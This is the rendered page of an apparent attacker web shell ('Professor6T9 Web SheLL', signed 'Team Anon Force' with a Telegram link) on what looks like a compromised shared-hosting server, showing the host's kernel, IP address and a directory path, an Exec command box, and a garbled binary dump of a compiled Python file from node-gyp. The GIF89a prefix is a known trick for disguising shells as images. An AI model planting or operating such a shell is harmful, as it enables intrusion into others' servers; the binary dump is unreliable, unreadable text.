GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
alt-nodejs9
/
root
/
lib
/
node_modules
/
npm
/
node_modules.bundled
/
node-gyp
/
gyp
/
pylib
/
gyp
[ HOME ]
Exec
Submit
File Name : MSVSProject.pyc
� o�Rac @ sg d Z d d l Z d d l j Z d e f d � � YZ d e f d � � YZ d e f d � � YZ d S( s$ Visual Studio project reader/writer.i����Nt Toolc B s# e Z d Z d d � Z d � Z RS( s Visual Studio tool.c C s | p i | _ | | j d <d S( so Initializes the tool. Args: name: Tool name. attrs: Dict of tool attributes; may be None. t NameN( t _attrs( t selft namet attrs( ( sm /opt/alt/alt-nodejs9/root/usr/lib/node_modules/npm/node_modules.bundled/node-gyp/gyp/pylib/gyp/MSVSProject.pyt __init__ s c C s d | j g S( s] Creates an element for the tool. Returns: A new xml.dom.Element for the tool. R ( R ( R ( ( sm /opt/alt/alt-nodejs9/root/usr/lib/node_modules/npm/node_modules.bundled/node-gyp/gyp/pylib/gyp/MSVSProject.pyt _GetSpecification s N( t __name__t __module__t __doc__t NoneR R ( ( ( sm /opt/alt/alt-nodejs9/root/usr/lib/node_modules/npm/node_modules.bundled/node-gyp/gyp/pylib/gyp/MSVSProject.pyR s t Filterc B s e Z d Z d d � Z RS( s1 Visual Studio filter - that is, a virtual folder.c C s"